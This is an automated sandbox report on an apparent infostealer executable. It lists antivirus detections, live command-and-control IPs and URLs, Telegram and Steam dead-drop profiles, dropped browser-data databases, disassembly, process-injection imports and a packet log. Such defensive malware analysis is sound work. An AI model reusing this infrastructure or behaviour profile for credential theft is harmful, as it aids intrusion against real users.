Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	115 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	4 File and Directory Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	54 System Information Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	32%	ReversingLabs	Win32.Infostealer.Bandra
file.exe	37%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.3.file.exe.526a20.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
0.2.file.exe.7fb280.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://88.198.94.71:80/233910279258.zipd87633a38bb03555514232-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6	0%	Avira URL Cloud	safe
http://116.202.6.206:80	3%	Virustotal		Browse
http://88.198.94.71/1148	4%	Virustotal		Browse
http://88.198.94.71/	1%	Virustotal		Browse
http://88.198.94.71:80/233910279258.zip	0%	Avira URL Cloud	safe
http://88.198.94.71:80/233910279258.zip8C	0%	Avira URL Cloud	safe
http://88.198.94.71/233910279258.zip	0%	Avira URL Cloud	safe
http://88.198.94.71/	0%	Avira URL Cloud	safe
http://116.202.6.206:80	0%	Avira URL Cloud	safe
http://88.198.94.71/1148	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://88.198.94.71/1148	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/asifrazatg	false		high
http://88.198.94.71/	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://88.198.94.71/233910279258.zip	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	58308559385186415876143610.2.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	false		high
https://duckduckgo.com/chrome_newtab	11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	false		high
https://t.me/	file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://88.198.94.71:80/233910279258.zipd87633a38bb03555514232-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6	file.exe, 00000002.00000002.244899570.00000000001AD000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://116.202.6.206:80	file.exe, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	58308559385186415876143610.2.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	false		high
https://web.telegram.org	file.exe, 00000002.00000003.234690206.0000000000764000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/asifrazatg&	file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/asifrazatghttps://steamcommunity.com/profiles/76561199439929669http://116.202.6.206:80p	file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfpf	11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	58308559385186415876143610.2.dr	false		high
http://88.198.94.71:80/233910279258.zip8C	file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://88.198.94.71:80/233910279258.zip	file.exe, 00000002.00000002.244899570.00000000001AD000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	58308559385186415876143610.2.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	false		high
https://steamcommunity.com/profiles/76561199439929669	file.exe, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.sqlite.org/copyright.html.	file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257451716.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
88.198.94.71	unknown	Germany		24940	HETZNER-ASDE	false
149.154.167.99	t.me	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756295
Start date and time:	2022-11-30 00:09:10 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.spyw.evad.winEXE@10/6@1/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 25.7% (good quality ratio 24.3%) Quality average: 79.3% Quality standard deviation: 29.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 94 Number of non-executed functions: 101
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
88.198.94.71	7a087c1bcd038c61ddb0f634f9b21e6db9bed59842f19.exe	Get hash	malicious	Browse	88.198.94.71/
149.154.167.99	W6qKnnjMEi	Get hash	malicious	Browse	t.me/jhzljkhbsdklzjdlkzj281679827sjah
149.154.167.99	snfstBXgxa	Get hash	malicious	Browse	t.me/cui8txvnmv

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
t.me	Orden de compra #PO0670.vbs	Get hash	malicious	Browse	188.114.96.3
	XJXuWlR8TZ.exe	Get hash	malicious	Browse	149.154.167.99
	7a087c1bcd038c61ddb0f634f9b21e6db9bed59842f19.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	c7oqCiKzbF.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.Win32.PWSX-gen.9296.19888.exe	Get hash	malicious	Browse	149.154.167.99
	synapse3.zip	Get hash	malicious	Browse	149.154.167.99
	00000000.exe	Get hash	malicious	Browse	149.154.167.99
	SyyMuhzBJ3.exe	Get hash	malicious	Browse	149.154.167.99
	Setup.exe	Get hash	malicious	Browse	149.154.167.99
	setup.exe	Get hash	malicious	Browse	149.154.167.99
	Setup.exe	Get hash	malicious	Browse	149.154.167.99
	Setup.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	file.exe	Get hash	malicious	Browse	149.154.167.99
	Xi5jMqYwwB.exe	Get hash	malicious	Browse	149.154.167.99
	gmK3QYmnDH.exe	Get hash	malicious	Browse	149.154.167.99
	h48Jsm7kqP.exe	Get hash	malicious	Browse	149.154.167.99
	Stealer.exe	Get hash	malicious	Browse	149.154.167.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	XJXuWlR8TZ.exe	Get hash	malicious	Browse	88.198.94.71
	RFQ_SFOETH12.js	Get hash	malicious	Browse	144.76.136.153
	7a087c1bcd038c61ddb0f634f9b21e6db9bed59842f19.exe	Get hash	malicious	Browse	88.198.94.71
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fpostsign.web.app/r9s0h3lind07rhinda51arn0h3ldr9slarkd07r9s0h3nW1&c=92652	Get hash	malicious	Browse	144.76.96.82
	file.exe	Get hash	malicious	Browse	88.198.94.71
	OAeO1VtpMo.exe	Get hash	malicious	Browse	116.202.5.223
	R4VIeZPAc7.exe	Get hash	malicious	Browse	116.202.5.223
	solicitud de presupuesto 29-11-2022.exe	Get hash	malicious	Browse	144.76.136.153
	c7oqCiKzbF.exe	Get hash	malicious	Browse	88.198.94.71
	nppshell.exe	Get hash	malicious	Browse	95.217.151.129
	SecuriteInfo.com.Win32.PWSX-gen.9296.19888.exe	Get hash	malicious	Browse	95.217.31.208
	D009780.exe	Get hash	malicious	Browse	95.216.34.216
	DOC999-2022.rar	Get hash	malicious	Browse	95.216.247.165
	mujkxuRYxu.exe	Get hash	malicious	Browse	116.202.5.223
	prog.apk	Get hash	malicious	Browse	144.76.58.8
	https://ipfs.io/ipfs/QmZscYPiZiEyUufsiTp73rjGySUVKx6mbYrEnns9n7DNVh?filename=ownredirectautoweb.html#news@pitchfork.com	Get hash	malicious	Browse	188.34.190.28
	m47Lhz6xqW.exe	Get hash	malicious	Browse	148.251.234.83
	ZbYq1RnBWJ.exe	Get hash	malicious	Browse	148.251.234.83
	Shipping-Documents.js	Get hash	malicious	Browse	144.76.136.153
	file.exe	Get hash	malicious	Browse	148.251.234.83

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	http://big55555.com	Get hash	malicious	Browse	149.154.167.99
	PO.exe	Get hash	malicious	Browse	149.154.167.99
	Benefits_Enrollment.html	Get hash	malicious	Browse	149.154.167.99
	Markelcorp Pay Application November 29, 2022_11725512247820161423.html	Get hash	malicious	Browse	149.154.167.99
	https://cialistabspharmacy.com/polaris/?aW52b2ljZUBlbWVyZ2lmaS5jb20=&d=DwMFAg	Get hash	malicious	Browse	149.154.167.99
	era 1.exe	Get hash	malicious	Browse	149.154.167.99
	Markelcorp Pay-Application Completed November 29, 2022_48707712230774110046.html	Get hash	malicious	Browse	149.154.167.99
	Remittance.html	Get hash	malicious	Browse	149.154.167.99
	November Draw Disbursed.html	Get hash	malicious	Browse	149.154.167.99
	November Draw Disbursed.html	Get hash	malicious	Browse	149.154.167.99
	7a087c1bcd038c61ddb0f634f9b21e6db9bed59842f19.exe	Get hash	malicious	Browse	149.154.167.99
	https://dobredrogi.exone-web.pl/INDEX.Php/login/ses/	Get hash	malicious	Browse	149.154.167.99
	http://web.jiont2.com	Get hash	malicious	Browse	149.154.167.99
	https://b6dj2ueylkg.juraganrc.com/?url=aHR0cHM6Ly9ob2xseS1sYXZlbmRlci1yYXR0bGVzbmFrZS5nbGl0Y2gubWUvdmlsZC5odG1s	Get hash	malicious	Browse	149.154.167.99
	0321423605241625.exe	Get hash	malicious	Browse	149.154.167.99
	PDF.shtml	Get hash	malicious	Browse	149.154.167.99
	Notification Details.html	Get hash	malicious	Browse	149.154.167.99
	https://schemevolcanosuspicions.com	Get hash	malicious	Browse	149.154.167.99
	ojPXdB4WTz.exe	Get hash	malicious	Browse	149.154.167.99
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fpostsign.web.app/r9s0h3lind07rhinda51arn0h3ldr9slarkd07r9s0h3nW1&c=92652	Get hash	malicious	Browse	149.154.167.99

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\10268862039712444505777708

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 4, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.47881670276786453
Encrypted:	false
SSDEEP:	96:eVdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3u:eVK+H3HDi9GN6IVj3XBBE3u
MD5:	C8A54C5A54BC6D813A12E47887D86821
SHA1:	98DDD99BBA14B47B75D4F8A53792221D162483FC
SHA-256:	00E175AD7C78A730A2754729174655A8686A663E878B88564F1D6164746FCF86
SHA-512:	BBC033381816DE6A86F34917F4A13486BE35DE0A4C4FD94EBF1306CDB106331C3417051B4269BA182D6410629513C92EB2700CCF6FDF4CF6415696B15C97ED51
Malicious:	false
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\11565709257171813179063097

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2889923589460437
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
MD5:	7901DD9DF50A993306401B7360977746
SHA1:	E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
SHA-256:	1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
SHA-512:	90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\48870274652683548820497570

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 4, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.47881670276786453
Encrypted:	false
SSDEEP:	96:eVdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3u:eVK+H3HDi9GN6IVj3XBBE3u
MD5:	C8A54C5A54BC6D813A12E47887D86821
SHA1:	98DDD99BBA14B47B75D4F8A53792221D162483FC
SHA-256:	00E175AD7C78A730A2754729174655A8686A663E878B88564F1D6164746FCF86
SHA-512:	BBC033381816DE6A86F34917F4A13486BE35DE0A4C4FD94EBF1306CDB106331C3417051B4269BA182D6410629513C92EB2700CCF6FDF4CF6415696B15C97ED51
Malicious:	false
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\58308559385186415876143610

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2889923589460437
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
MD5:	7901DD9DF50A993306401B7360977746
SHA1:	E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
SHA-256:	1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
SHA-512:	90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\82308976761520470245380715

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4393511334109407
Encrypted:	false
SSDEEP:	24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
MD5:	8C31C5487A97BBE73711C5E20600C1F6
SHA1:	D4D6B04226D8FFC894749B3963E7DB7068D6D773
SHA-256:	A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
SHA-512:	394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\82668342394913559298137947

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.359412301232748
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	371200
MD5:	5367709f0a96713b5c9a518e13f306d6
SHA1:	244bdcc9a3548101cacc9c4f8912fb8631764b40
SHA256:	2cc0be582a350f1eafb6d3c6cc713393098a6936346a9070ba55abd346dfb090
SHA512:	e8ef72e92e7524f8529e4b9f0232550c07ced72971bff2072d1f81989a1f6174fca03100b540f777d87fd0048048af31bfd203c51d30ec584d490cb3424f84f8
SSDEEP:	6144:/Xd9qQwRToa3lQZCsPuugr+mJ35AfpJW+0sZZLBO+jJJM9KSlAo8hV:fdEVBoOlQnuuG+k3efD6sjLelAdb
TLSH:	8E84E041E718469EC97919F60431971F6F5458900FA082EB438FBE6A6B3368B87EFC43
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7?.yYl.yYl.yYl...l.yYl..]m.yYl..Zm.yYl..\m.yYl..Xm.yYl..Xm.yYl.yXl.yYlT.Pm.yYlT..l.yYlT.[m.yYlRich.yYl................PE..L..

File Icon


Icon Hash:	00c1062769747441

Static PE Info

General

Entrypoint:	0x402851
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6385E4DB [Tue Nov 29 10:54:19 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	6294a2f7da3a84900c7e91cad8ab870e

Entrypoint Preview

Instruction
call 00007FCC80F5E025h
jmp 00007FCC80F5D86Fh
retn 0000h
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040402Ch]
push dword ptr [ebp+08h]
call dword ptr [00404058h]
push C0000409h
call dword ptr [00404030h]
push eax
call dword ptr [00404034h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [00404038h]
test eax, eax
je 00007FCC80F5D9F7h
push 00000002h
pop ecx
int 29h
mov dword ptr [0044EFC8h], eax
mov dword ptr [0044EFC4h], ecx
mov dword ptr [0044EFC0h], edx
mov dword ptr [0044EFBCh], ebx
mov dword ptr [0044EFB8h], esi
mov dword ptr [0044EFB4h], edi
mov word ptr [0044EFE0h], ss
mov word ptr [0044EFD4h], cs
mov word ptr [0044EFB0h], ds
mov word ptr [0044EFACh], es
mov word ptr [0044EFA8h], fs
mov word ptr [0044EFA4h], gs
pushfd
pop dword ptr [0044EFD8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0044EFCCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0044EFD0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0044EFDCh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [0044EF18h], 00000001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x48fc	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x50000	0xddd8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5e000	0x310	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x4300	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4240	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4000	0x11c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2144	0x2200	False	0.5970818014705882	data	6.109737699299444	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4000	0x10a6	0x1200	False	0.3993055555555556	data	4.440653872428405	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x6000	0x497a8	0x49000	False	0.9481585776969178	data	7.658127773950707	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x50000	0xddd8	0xde00	False	0.09496410472972973	data	3.179746451017983	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5e000	0x310	0x400	False	0.7275390625	data	5.550811047884393	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x500f0	0xda28	Device independent bitmap graphic, 105 x 256 x 32, image size 53760, resolution 25259 x 25259 px/m	Russian	Russia
RT_GROUP_ICON	0x5db18	0x14	data	Russian	Russia
RT_VERSION	0x5db30	0x2a8	data

Imports

DLL	Import
KERNEL32.dll	GetModuleFileNameA, WriteProcessMemory, ResumeThread, GetModuleHandleA, GetThreadContext, GetProcAddress, ExitProcess, ReadProcessMemory, CreateProcessA, SetThreadContext, IsDebuggerPresent, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, UnhandledExceptionFilter
MSVCP140.dll	?_Xlength_error@std@@YAXPBD@Z
VCRUNTIME140.dll	_except_handler4_common, memset, __current_exception_context, memcpy, _CxxThrowException, __std_exception_copy, __std_exception_destroy, __CxxFrameHandler3, __current_exception, memmove
api-ms-win-crt-runtime-l1-1-0.dll	_crt_atexit, _cexit, _seh_filter_exe, _set_app_type, _register_onexit_function, _initterm, _initterm_e, _exit, exit, _c_exit, _register_thread_local_exe_atexit_callback, _initialize_narrow_environment, _configure_narrow_argv, _get_narrow_winmain_command_line, terminate, _controlfp_s, _initialize_onexit_table, _invalid_parameter_noinfo_noreturn
api-ms-win-crt-stdio-l1-1-0.dll	_set_fmode, __p__commode
api-ms-win-crt-utility-l1-1-0.dll	rand, srand
api-ms-win-crt-heap-l1-1-0.dll	_callnewh, malloc, free, _set_new_mode
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2022 00:10:03.696094990 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:03.696155071 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:03.696418047 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:03.747873068 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:03.747900009 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:03.825840950 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:03.825999022 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:04.305008888 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:04.305059910 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.305671930 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.310623884 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:04.318892956 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:04.318938017 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.355186939 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.355230093 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.355340004 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.355359077 CET	443	49707	149.154.167.99	192.168.2.7
Nov 30, 2022 00:10:04.355654955 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:04.483719110 CET	49707	443	192.168.2.7	149.154.167.99
Nov 30, 2022 00:10:04.483772993 CET	443	49707	149.154.167.99	192.168.2.7
